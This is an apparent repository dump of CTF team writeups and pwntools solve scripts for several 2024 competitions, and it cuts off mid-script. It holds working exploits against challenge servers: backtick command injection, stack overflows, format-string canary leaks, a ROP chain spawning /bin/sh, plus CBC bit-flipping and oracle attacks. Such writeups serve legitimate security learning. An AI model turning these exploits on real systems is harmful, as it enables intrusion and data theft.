https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_09_28_BuckeyeCTF24/pwn/runway0/runway0.zip -------------------------------------------------------------------------------- /2024_09_28_BuckeyeCTF24/pwn/runway0/writeup.md: -------------------------------------------------------------------------------- 1 | https://ctftime.org/event/2449 2 | 3 | # runway0 (pwn) 4 | 5 | If you've never done a CTF before, this runway should help! 6 | 7 | Hint: MacOS users (on M series) will need a x86 Linux VM. Tutorial is here: pwnoh.io/utm 8 | 9 | nc challs.pwnoh.io 13400 10 | 11 | ## Analysis 12 | 13 | We can see that whatever we supply is inserted between two `"`s as an argument to `cowsay` and then passed to system. 14 | 15 | This should allow us to easily run a command during the evaluation of `cowsay`'s arguments using backticks or ` 16 | 17 | ## Solution 18 | 19 | ```python 20 | #!/usr/bin/env python3 21 | 22 | from pwn import * 23 | 24 | #context.log_level = "debug" 25 | p = remote("challs.pwnoh.io", 13400) 26 | 27 | p.sendline(b"`cat flag.txt`") 28 | 29 | p.interactive() # bctf{0v3rfl0w_th3_M00m0ry_2d310e3de286658e} 30 | ``` 31 | 32 | ## Flag 33 | `bctf{0v3rfl0w_th3_M00m0ry_2d310e3de286658e}` 34 | 35 | smiley 2024/09/29 36 | -------------------------------------------------------------------------------- /2024_09_28_BuckeyeCTF24/pwn/runway1/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./runway1", checksec=False) 7 | context.binary = elf 8 | 9 | #p = elf.process() 10 | #p = elf.debug(gdbscript="") 11 | p = remote("challs.pwnoh.io", 13401) 12 | 13 | payload = b"" 14 | payload += b"A" * 0x4c 15 | payload += p64(elf.sym["win"]) 16 | 17 | p.sendlineafter(b"food?\n", payload) 18 | 19 | p.sendline(b"/bin/cat flag.txt") 20 | 21 | p.interactive() # bctf{I_34t_fl4GS_4_bR34kf4st_7c639e33ffcfe8c2} 22 | -------------------------------------------------------------------------------- /2024_09_28_BuckeyeCTF24/pwn/runway1/runway1.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_09_28_BuckeyeCTF24/pwn/runway1/runway1.zip -------------------------------------------------------------------------------- /2024_09_28_BuckeyeCTF24/pwn/runway2/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./runway2", checksec=False) 7 | context.binary = elf 8 | 9 | #p = elf.process() 10 | #p = elf.debug(gdbscript="b win") 11 | p = remote("challs.pwnoh.io", 13402) 12 | 13 | payload = b"" 14 | payload += b"A" * 0x1c 15 | payload += p32(elf.sym["win"]) 16 | payload += p32(0) 17 | payload += p32(0xc0ffee) 18 | payload += p32(0x007ab1e) 19 | 20 | p.sendlineafter(b"?\n", payload) 21 | 22 | p.readline() 23 | 24 | p.sendline(b"/bin/cat flag.txt") 25 | 26 | p.interactive() # bctf{I_m1sS_4r1thm3t1c_qu1ZZ3s_2349adb53baa2955} 27 | -------------------------------------------------------------------------------- /2024_09_28_BuckeyeCTF24/pwn/runway2/runway2.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_09_28_BuckeyeCTF24/pwn/runway2/runway2.zip -------------------------------------------------------------------------------- /2024_09_28_BuckeyeCTF24/pwn/runway3/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./runway3", checksec=False) 7 | context.binary = elf 8 | 9 | #p = elf.process() 10 | #p = elf.debug(gdbscript="") 11 | p = remote("challs.pwnoh.io", 13403) 12 | 13 | p.sendlineafter(b"?\n", b"%13$p") 14 | canary = int(p.readline().decode(), 16) 15 | 16 | payload = b"A" * 0x28 17 | payload += p64(canary) 18 | payload += p64(0) 19 | payload += p64(elf.sym["win"] + 0x17) 20 | 21 | p.sendline(payload) 22 | 23 | p.recv(0x28) 24 | 25 | p.sendline(b"/bin/cat flag.txt") 26 | 27 | p.interactive() # bctf{wh0_kn3w_pr1nt1ng_w4s_s0_d4nG3R0Us_11aabc3287e74603} 28 | -------------------------------------------------------------------------------- /2024_09_28_BuckeyeCTF24/pwn/runway3/runway3.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_09_28_BuckeyeCTF24/pwn/runway3/runway3.zip -------------------------------------------------------------------------------- /2024_10_12_BlueWaterCTF24/README.md: -------------------------------------------------------------------------------- 1 | # Blue Water CTF 2024 Writeups 2 | 3 | https://ctftime.org/event/2479 4 | 5 | 28th place 607 points 6 | -------------------------------------------------------------------------------- /2024_10_12_BlueWaterCTF24/crypto/MD5.01/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | from os import system 5 | 6 | # https://github.com/brimstone/fastcoll 7 | 8 | system("./fastcoll -o msg1.bin msg2.bin") 9 | 10 | m1 = open("msg1.bin", "rb").read().hex() 11 | m2 = open("msg2.bin", "rb").read().hex() 12 | 13 | p = remote("md5-01.chal.perfect.blue", 1337) 14 | 15 | p.sendlineafter(b"m1 > ", m1.encode()) 16 | p.sendlineafter(b"m2 > ", m2.encode()) 17 | 18 | p.interactive() 19 | -------------------------------------------------------------------------------- /2024_10_12_BlueWaterCTF24/rev/maybe_Checker/maybe_checker: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_10_12_BlueWaterCTF24/rev/maybe_Checker/maybe_checker -------------------------------------------------------------------------------- /2024_10_19_SunshineCTF24/README.md: -------------------------------------------------------------------------------- 1 | # Sunshine CTF 2024 Writeups 2 | 3 | https://ctftime.org/event/2485 4 | 5 | 65th place 1068 points 6 | -------------------------------------------------------------------------------- /2024_10_19_SunshineCTF24/pwn/adventure_on_the_high_c/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM tjoconnor/bin-hosting 2 | 3 | #RUN apt-get update -qq -y && apt-get -qq -y install gdb git python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential python3-pwntools tmux 4 | #RUN git clone https://github.com/pwndbg/pwndbg && cd pwndbg && ./setup.sh 5 | 6 | COPY ship.bin /chal 7 | COPY flag.txt /flag.txt 8 | -------------------------------------------------------------------------------- /2024_10_19_SunshineCTF24/pwn/adventure_on_the_high_c/ship.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_10_19_SunshineCTF24/pwn/adventure_on_the_high_c/ship.bin -------------------------------------------------------------------------------- /2024_10_19_SunshineCTF24/pwn/flag_shop/flagshop: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_10_19_SunshineCTF24/pwn/flag_shop/flagshop -------------------------------------------------------------------------------- /2024_10_19_SunshineCTF24/pwn/flag_shop/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./flagshop", checksec=False) 7 | context.binary = elf 8 | 9 | p = remote("2024.sunshinectf.games", 24001) 10 | 11 | p.sendline(b"smiley") 12 | p.sendline(b"he/him") 13 | 14 | payload = b"\x01\x00" 15 | payload += b"A" * 8 16 | payload += b"%9$s" 17 | payload = payload.ljust(0x2a, b"\x01") 18 | p.sendline(payload) 19 | 20 | p.sendlineafter(b"1)", b"1") 21 | 22 | p.readuntil(b"current user: ") 23 | flag = p.readuntil(b"}").decode() 24 | 25 | log.success(flag) # sun{c@n_st1ll_r3@d_off_the_he@p_fr0m_st@ck_po!nters!} 26 | 27 | -------------------------------------------------------------------------------- /2024_10_25_HeroCTF24/README.md: -------------------------------------------------------------------------------- 1 | # Hero CTF v6 2024 Writeups 2 | 3 | https://ctftime.org/event/2496 4 | 5 | 91st place 1402 points 6 | -------------------------------------------------------------------------------- /2024_10_25_HeroCTF24/crypto/halloween/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | p = remote("crypto.heroctf.fr", 9001) 7 | 8 | c1 = p.readline().decode()[39:(77*2)+39] 9 | 10 | p1 = b"A" * 77 11 | for i in range(0x100): 12 | p.sendline(p1.hex().encode()) 13 | c2 = p.readline().decode() 14 | 15 | key_stream = xor(bytes.fromhex(c1), bytes.fromhex(c2)) 16 | flag = xor(key_stream, p1).decode() 17 | print(flag) # Hero{5p00ky_5c4ry_fl4w3d_cryp70_1mpl3m3n74710ns_53nd_5h1v3r5_d0wn_y0ur_5p1n3} 18 | -------------------------------------------------------------------------------- /2024_10_25_HeroCTF24/crypto/halloween/halloween.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_10_25_HeroCTF24/crypto/halloween/halloween.zip -------------------------------------------------------------------------------- /2024_10_25_HeroCTF24/crypto/interpolation/interpolation.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_10_25_HeroCTF24/crypto/interpolation/interpolation.zip -------------------------------------------------------------------------------- /2024_10_25_HeroCTF24/crypto/paranoia/paranoia.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_10_25_HeroCTF24/crypto/paranoia/paranoia.zip -------------------------------------------------------------------------------- /2024_10_25_HeroCTF24/pwn/bankrupst/bankrupst: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_10_25_HeroCTF24/pwn/bankrupst/bankrupst -------------------------------------------------------------------------------- /2024_10_25_HeroCTF24/pwn/bankrupst/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./bankrupst", checksec=False) 7 | context.binary = elf 8 | 9 | #p = elf.process() 10 | #p = elf.debug(gdbscript="") 11 | p = remote("pwn.heroctf.fr", 6001) 12 | 13 | p.sendlineafter(b"Choose an option: ", b"1") 14 | 15 | for i in range(10): 16 | p.sendlineafter(b"Choose an option:", b"2") 17 | p.sendlineafter(b"deposit?", b"100") 18 | 19 | p.sendlineafter(b"Choose an option: ", b"6") 20 | 21 | p.sendlineafter(b"Choose an option: ", b"1") 22 | 23 | for i in range(4): 24 | p.sendlineafter(b"Choose an option:", b"2") 25 | p.sendlineafter(b"deposit?", b"100") 26 | 27 | p.sendlineafter(b"Choose an option: ", b"4") 28 | 29 | p.readuntil(b"member!\n") 30 | 31 | log.success(p.readline().decode()) # Hero{B4nkk_Rupst3dDd!!1x33x7} 32 | -------------------------------------------------------------------------------- /2024_10_25_HeroCTF24/pwn/heappie/heappie.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_10_25_HeroCTF24/pwn/heappie/heappie.zip -------------------------------------------------------------------------------- /2024_11_01_HackTheVote24/README.md: -------------------------------------------------------------------------------- 1 | # Hack The Vote 2024 Writeups 2 | 3 | https://ctftime.org/event/2498 4 | 5 | 107th place 101 points 6 | -------------------------------------------------------------------------------- /2024_11_01_HackTheVote24/pwn/comma_club/comma-club.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_11_01_HackTheVote24/pwn/comma_club/comma-club.tar.gz -------------------------------------------------------------------------------- /2024_11_01_HackTheVote24/pwn/comma_club/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | while True: 6 | with remote("comma-club.chal.hackthe.vote", 1337) as p: 7 | p.sendlineafter(b"> ", b"3") 8 | p.sendlineafter(b"> ", b"\x00") 9 | if b"Correct" in p.readline(): 10 | p.sendlineafter(b"exit.", b"/bin/cat flag") 11 | p.interactive() # flag{w3lc0me_2_TH3_2_c0mm4_c1ub} 12 | break 13 | -------------------------------------------------------------------------------- /2024_11_10_BlueHens24/README.md: -------------------------------------------------------------------------------- 1 | # Blue Hens CTF 2024 Writeups 2 | 3 | https://ctftime.org/event/2512 4 | 5 | 26th place 4758 points 6 | -------------------------------------------------------------------------------- /2024_11_10_BlueHens24/crypto/intro_to_rsa/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | c = 9015202564552492364962954854291908723653545972440223723318311631007329746475 4 | n = 51328431690246050000196200646927542588629192646276628974445855970986472407007 5 | e = 65537 6 | 7 | # sage: n = 51328431690246050000196200646927542588629192646276628974445855970986472407007 8 | # sage: n.factor() 9 | # 186574907923363749257839451561965615541 * 275108975057510790219027682719040831427 10 | 11 | p = 186574907923363749257839451561965615541 12 | q = 275108975057510790219027682719040831427 13 | d = pow(e, -1, (p-1)*(q-1)) 14 | m = pow(c, d, n) 15 | flag = m.to_bytes(length=(m.bit_length() + 7) // 8).decode() 16 | print(flag) # udctf{just_4_s1mpl3_RS4} 17 | -------------------------------------------------------------------------------- /2024_11_10_BlueHens24/crypto/intro_to_rsa/writeup.md: -------------------------------------------------------------------------------- 1 | https://ctftime.org/event/2512 2 | 3 | # Intro To RSA (crypto) 4 | 5 | ```python 6 | In [9]: p = getPrime(128) 7 | In [10]: q = getPrime(128) 8 | In [11]: N = p*q 9 | In [12]: bytes_to_long(flag) < N 10 | Out[12]: True 11 | In [13]: print(pow(bytes_to_long(flag), 65537, N), N) 12 | 9015202564552492364962954854291908723653545972440223723318311631007329746475 51328431690246050000196200646927542588629192646276628974445855970986472407007 13 | ``` 14 | 15 | ## Solution 16 | 17 | ```python 18 | #!/usr/bin/env python3 19 | 20 | c = 9015202564552492364962954854291908723653545972440223723318311631007329746475 21 | n = 51328431690246050000196200646927542588629192646276628974445855970986472407007 22 | e = 65537 23 | 24 | # sage: n = 51328431690246050000196200646927542588629192646276628974445855970986472407007 25 | # sage: n.factor() 26 | # 186574907923363749257839451561965615541 * 275108975057510790219027682719040831427 27 | 28 | p = 186574907923363749257839451561965615541 29 | q = 275108975057510790219027682719040831427 30 | d = pow(e, -1, (p-1)*(q-1)) 31 | m = pow(c, d, n) 32 | flag = m.to_bytes(length=(m.bit_length() + 7) // 8).decode() 33 | print(flag) # udctf{just_4_s1mpl3_RS4} 34 | ``` 35 | 36 | ## Flag 37 | `udctf{just_4_s1mpl3_RS4}` 38 | 39 | smiley 2024/11/10 40 | -------------------------------------------------------------------------------- /2024_11_10_BlueHens24/pwn/intro_to_pwn/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./pwnme", checksec=True) 7 | context.binary = elf 8 | 9 | #p = elf.process() 10 | #p = elf.debug(gdbscript="") 11 | p = remote("0.cloud.chals.io", 13545) 12 | 13 | payload = b"" 14 | payload += b"A" * 0x38 15 | payload += p64(elf.sym["win"] + 8) 16 | p.sendline(payload) 17 | 18 | p.sendline(b"/bin/cat flag.txt") 19 | 20 | p.interactive() # udctf{h00r4y_I_am_a_pwn3r_n0w} 21 | -------------------------------------------------------------------------------- /2024_11_10_BlueHens24/pwn/intro_to_pwn/pwnme: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_11_10_BlueHens24/pwn/intro_to_pwn/pwnme -------------------------------------------------------------------------------- /2024_11_10_BlueHens24/pwn/pure_write_what_where/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | context.log_level = "critical" 6 | elf = ELF("./pwnme", checksec=True) 7 | context.binary = elf 8 | 9 | while True: 10 | try: 11 | with remote("0.cloud.chals.io", 16612) as p: 12 | p.sendline(str(60).encode()) 13 | p.sendline(str((elf.sym["win"] + 8) & 0xffff).encode()) 14 | p.sendline(b"/bin/cat flag.txt") 15 | p.readline() 16 | p.readline() 17 | flag = p.readline() 18 | if b"udctf{" in flag: 19 | print(flag.decode()) # udctf{th3_0n3_1n_s1xt33n_pwn_str4t_FTW} 20 | break 21 | except: 22 | continue 23 | -------------------------------------------------------------------------------- /2024_11_10_BlueHens24/pwn/pure_write_what_where/pwnme: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_11_10_BlueHens24/pwn/pure_write_what_where/pwnme -------------------------------------------------------------------------------- /2024_11_10_BlueHens24/pwn/ret2bf/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./pwnme", checksec=False) 7 | context.binary = elf 8 | 9 | libc = ELF("./libc.so.6", checksec=False) 10 | 11 | #p = elf.process() 12 | #p = elf.debug(gdbscript="b bf") # +241 13 | p = remote("0.cloud.chals.io", 31782) 14 | 15 | payload = b"" 16 | payload += b">" * 120 17 | payload += b".>" * 8 18 | payload += b"<" * 40 19 | payload += b",>-" # use this to return to main 20 | p.sendlineafter(b">", payload) 21 | 22 | leak = b"" 23 | for i in range(8): 24 | leak = leak + p.recv(1) 25 | leak = u64(leak) 26 | 27 | libc.address = leak - 0x29d90 28 | log.success(f"libc.address {hex(libc.address)}") 29 | 30 | p.send(b"\xbc") # last byte of ret main for ret2main 31 | 32 | rop = ROP(libc) 33 | rop.rsi = 0 34 | rop.rdi = p64(next(libc.search(b"/bin/sh\x00"))) 35 | rop.rdx = 0 36 | rop.rax = constants.SYS_execve 37 | rop.raw(rop.find_gadget(['syscall', 'ret'])[0]) 38 | ropchain = rop.chain() 39 | 40 | payload = b"" 41 | payload += b">" * 88 42 | payload += b",>" * len(ropchain) # use this to return to libc 43 | p.sendlineafter(b">", payload) 44 | 45 | p.send(ropchain) 46 | 47 | p.interactive() # udctf{I_b3t_th4t_f3lt_s0_g00d} 48 | -------------------------------------------------------------------------------- /2024_11_10_BlueHens24/pwn/ret2bf/ret2bf.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_11_10_BlueHens24/pwn/ret2bf/ret2bf.zip -------------------------------------------------------------------------------- /2024_11_10_BlueHens24/web/just-a-day-at-the-breach/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import requests 4 | import string 5 | 6 | def guess_big(w): 7 | REMOTE = ( 8 | "https://55nlig2es7hyrhvzcxzboyp4xe0nzjrc.lambda-url.us-east-1.on.aws/?payload=" 9 | + w 10 | ) 11 | res = requests.get(REMOTE) 12 | print(bytes.fromhex(w), res.text, flush=True) 13 | print("---", flush=True) 14 | return res.json() 15 | 16 | flag = b"udctf{" 17 | for _ in range(64): 18 | for c in string.ascii_letters + string.digits + string.punctuation: 19 | c = c.encode() 20 | j = guess_big((flag + c).hex())["sniffed"] 21 | 22 | if j < 68: 23 | max = j 24 | flag = flag + c 25 | break 26 | print(f"DEBUGPRINT[12]: lab1.py:49: flag={flag}") 27 | -------------------------------------------------------------------------------- /2024_11_10_BlueHens24/web/just-a-day-at-the-breach/writeup.md: -------------------------------------------------------------------------------- 1 | https://ctftime.org/event/2512 2 | 3 | # just a day at the breach (web) 4 | 5 | zlib compress challenge 6 | 7 | ## Solution 8 | 9 | The challenge gives a oracle that shows the message length. 10 | So we can guess every character and if the length changes thats the correct character. 11 | Example: 12 | `uu` -> 67 13 | `ub` -> 68 14 | 15 | ```python 16 | #!/usr/bin/env python3 17 | 18 | import requests 19 | import string 20 | 21 | def guess_big(w): 22 | REMOTE = ( 23 | "https://55nlig2es7hyrhvzcxzboyp4xe0nzjrc.lambda-url.us-east-1.on.aws/?payload=" 24 | + w 25 | ) 26 | res = requests.get(REMOTE) 27 | print(bytes.fromhex(w), res.text, flush=True) 28 | print("---", flush=True) 29 | return res.json() 30 | 31 | flag = b"udctf{" 32 | for _ in range(64): 33 | for c in string.ascii_letters + string.digits + string.punctuation: 34 | c = c.encode() 35 | j = guess_big((flag + c).hex())["sniffed"] 36 | 37 | if j < 68: 38 | max = j 39 | flag = flag + c 40 | break 41 | print(f"DEBUGPRINT[12]: lab1.py:49: flag={flag}") 42 | ``` 43 | 44 | ## Flag 45 | `udctf{huffm4n_br34ched_l3t5_go}` 46 | 47 | shafouz 2024/11/10 48 | -------------------------------------------------------------------------------- /2024_11_10_BlueHens24/xor/cbc_encrypted/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | import requests 5 | 6 | url = "https://vbbfgwcc6dnuzlawkslmxvlni40zkayu.lambda-url.us-east-1.on.aws/" 7 | response = requests.get(url) 8 | data = response.json() 9 | token = data["token"] 10 | iv = bytes.fromhex(data["iv"]) 11 | log.success(data) 12 | 13 | known_plaintext = b'{"role":"guest",' 14 | wanted_plaintext = b'{"role":"admin",' 15 | iv = xor(xor(iv, known_plaintext), wanted_plaintext) 16 | 17 | url = "https://vbbfgwcc6dnuzlawkslmxvlni40zkayu.lambda-url.us-east-1.on.aws/?token=" + token + "&iv=" + iv.hex() 18 | response = requests.get(url) 19 | data = response.json() 20 | flag = data["flag"] 21 | log.success(flag) # udctf{1v_m4n1pul4t10n_FTW_just_anoth3r_x0R_4pplic4tion} 22 | -------------------------------------------------------------------------------- /2024_11_10_BlueHens24/xor/ctr_mode_is_just_xor/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | import requests 5 | 6 | url = "https://i8fgyps3o2.execute-api.us-east-1.amazonaws.com/default/ctrmode?pt=00" 7 | response = requests.get(url) 8 | data = response.json() 9 | probiv = data["probiv"] # GPEq6Sqzy6dLmeM 10 | flagenc = data["flagenc"] 11 | log.success(data) 12 | 13 | iv = unhex(probiv) + b"\x00" + unhex(probiv) + b"\x01" + unhex(probiv) + b"\x02" + unhex(probiv) + b"\x03" 14 | 15 | url = "https://i8fgyps3o2.execute-api.us-east-1.amazonaws.com/default/ctrmode?pt=" + iv.hex() 16 | response = requests.get(url) 17 | data = response.json() 18 | ciphertext = data["ciphertext"] 19 | log.success(data) 20 | 21 | flag = xor(bytes.fromhex(ciphertext), bytes.fromhex(flagenc))[:50].decode() 22 | print(flag) # UDCTF{th3r3_15_n0_sp00n_y0uv3_alr34dy_d3c1d3d_NE0} 23 | -------------------------------------------------------------------------------- /2024_11_10_BlueHens24/xor/ctr_mode_is_just_xor/lambda.py: -------------------------------------------------------------------------------- 1 | #LIVE AT https://i8fgyps3o2.execute-api.us-east-1.amazonaws.com/default/ctrmode?pt=00 2 | 3 | import json 4 | import os 5 | import sys 6 | from Crypto.Cipher import AES 7 | from Crypto.Util.Padding import pad, unpad 8 | 9 | 10 | def lambda_handler(event, context): 11 | pt=bytes.fromhex(event["queryStringParameters"]["pt"]) 12 | padded = pad(pt, 16) 13 | 14 | probiv = os.environ["probiv"] 15 | flag = os.environ["flag"] 16 | padflag = pad(flag.encode(), 16) 17 | flagcipher = AES.new(os.environ["secretkey"].encode(), AES.MODE_CTR, nonce=probiv.encode()) 18 | pct = flagcipher.encrypt(padflag) 19 | 20 | yourcipher = AES.new(os.environ["secretkey"].encode(), AES.MODE_ECB) 21 | try: 22 | encrypted = yourcipher.encrypt(padded) 23 | except ValueError as e: 24 | return {'statusCode': 500, "error": str(e)} 25 | 26 | return { 27 | 'statusCode': 200, 28 | 'body': json.dumps({"ciphertext": encrypted.hex(), "probiv": probiv.encode().hex(), "flagenc": pct.hex()}) 29 | } 30 | -------------------------------------------------------------------------------- /2024_11_10_BlueHens24/xor/roman_xor/romanXor.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import os 3 | f=open("poems.txt","r") 4 | lngstr=f.read() 5 | f.close() 6 | lines = lngstr.split("\n") 7 | lines = list(filter(lambda x: len(x) > 30, lines)) 8 | import random 9 | winners = [random.choice(lines) for _ in range(10)] 10 | def simple(ltr): 11 | return ltr.isalpha() or ltr == " " 12 | 13 | pts = ["".join(filter(simple, x)).strip().lower() for x in winners] + ["udctf{placeholder_flag_here}"] 14 | key = os.urandom(100) 15 | cts = [xor(x.encode(),key[:len(x)]).hex() for x in pts] 16 | print(cts) -------------------------------------------------------------------------------- /2024_11_10_BlueHens24/xor/xor_without_xor/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | flag = 'u_cnfrj_sr_b_34}yd1tt{0upt04lbmb' 6 | print((flag*32)[::17][:32]) # udctf{just_4_b4by_1ntr0_pr0bl3m} 7 | -------------------------------------------------------------------------------- /2024_11_15_1337UP24/README.md: -------------------------------------------------------------------------------- 1 | # 1337 UP LIVE 2024 Writeups 2 | 3 | https://ctftime.org/event/2446 4 | 5 | 217th place 962 points 6 | -------------------------------------------------------------------------------- /2024_11_15_1337UP24/crypto/krsa/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | p = remote("krsa.ctf.intigriti.io", 1346) 7 | #p = process(["python3", "./kRSA.py"]) 8 | 9 | p.readuntil(b"n=") 10 | n = int(p.readline().decode()) 11 | 12 | p.readuntil(b"e=") 13 | e = int(p.readline().decode()) 14 | 15 | p.readuntil(b"ck=") 16 | ck = int(p.readline().decode()) 17 | 18 | def recover_k(c, e, n): 19 | A = {} 20 | for i in range(1, 0xffff): 21 | x = (pow(pow(i, -1, n), e, n) * c) % n 22 | A[x] = i 23 | 24 | for j in range(1, 0xfffff): 25 | y = pow(j, e, n) 26 | if y in A: 27 | i = A[y] 28 | return i * j 29 | 30 | k = recover_k(ck, e, n) 31 | 32 | p.sendlineafter(b"Secret key ? ", str(k).encode()) 33 | 34 | p.interactive() # INTIGRITI{w3_sh0uld_m33t_1n_th3_m1ddl3} 35 | -------------------------------------------------------------------------------- /2024_11_15_1337UP24/crypto/schrodingers_pad/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | p = remote("pad.ctf.intigriti.io", 1348) 7 | 8 | p.readuntil(b": ") 9 | 10 | flag = bytes.fromhex(p.readline().decode()) 11 | 12 | known_plaintext = b"A" * 160 13 | p.sendlineafter(b"yourself?\n", known_plaintext) 14 | 15 | p.readuntil(b"state=") 16 | state = p.readuntil(b"): ")[:-3] 17 | 18 | ciphertext = bytearray(bytes.fromhex(p.readline().decode())) 19 | 20 | if state == b"alive": 21 | for i in range(len(ciphertext)): 22 | ciphertext[i] ^= 0xAC 23 | ciphertext[i] = ciphertext[i] >> 1 24 | 25 | if state == b"dead": 26 | for i in range(len(ciphertext)): 27 | ciphertext[i] ^= 0xCA 28 | ciphertext[i] = ((ciphertext[i] << 1) | (ciphertext[i] >> 7)) & 0xFF 29 | 30 | keystream = xor(known_plaintext, ciphertext) 31 | flag = xor(keystream, flag).decode()[37:61] 32 | print(flag) # INTIGRITI{d34d_0r_4l1v3} 33 | -------------------------------------------------------------------------------- /2024_11_15_1337UP24/crypto/schrodingers_pad/schrodingers_pad.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_11_15_1337UP24/crypto/schrodingers_pad/schrodingers_pad.zip -------------------------------------------------------------------------------- /2024_11_15_1337UP24/pwn/floormat_mega_sale/floormat_sale.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rerrorctf/writeups/5bb62d1fe3a3f71fadcc90307af43307d53bef7c/2024_11_15_1337UP24/pwn/floormat_mega_sale/floormat_sale.zip -------------------------------------------------------------------------------- /2024_11_15_1337UP24/pwn/floormat_mega_sale/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./floormat_sale", checksec=False) 7 | context.binary = elf 8 | 9 | #p = elf.process() 10 | #p = elf.debug(gdbscript="") 11 | p = remote("floormatsale.ctf.intigriti.io", 1339) 12 | 13 | p.sendlineafter(b"your choice:\r\n", str(6).encode()) 14 | 15 | payload = fmtstr_payload(10, {elf.sym["employee"]: 1 & 0xff}) 16 | p.sendlineafter(b"shipping address:\r\n", payload) 17 | 18 | p.readuntil(b"delivered to: ") 19 | print(p.readline()[:-2].decode()) # INTIGRITI{3v3ry_fl00rm47_mu57_60!!} 20 | -------------------------------------------------------------------------------- /2024_11_15_1337UP24/pwn/retro2win/go.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | 5 | #context.log_level = "debug" 6 | elf = ELF("./retro2win", checksec=False) 7 | context.binary = elf 8 | 9 | #p = elf.process() 10 | #p = elf.debug(gdbscript="") 11 | p = remote("retro2win.ctf.intigriti.io", 1338) 12 | 13 | p.sendlineafter(b"option:\r\n", str(0x539).encode()) 14 | 15 | rop = ROP(elf) 16 | rop.raw(b"A" * 0x18) 17 | rop.rdi = 0x2323232323232323 18 | rop.rsi = 0x4242424242424242 19 | rop.call("cheat_mode") 20 | 21 | p.sendlineafter(b"Enter your 